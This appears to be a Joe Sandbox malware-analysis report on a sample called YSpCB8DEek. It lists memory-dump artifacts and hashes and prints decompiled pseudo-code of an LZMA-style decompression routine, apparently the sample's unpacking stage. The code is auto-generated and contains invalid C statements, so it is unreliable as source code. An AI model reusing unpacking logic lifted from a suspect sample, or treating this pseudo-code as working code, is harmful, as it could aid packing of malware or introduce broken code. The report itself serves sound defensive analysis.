                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
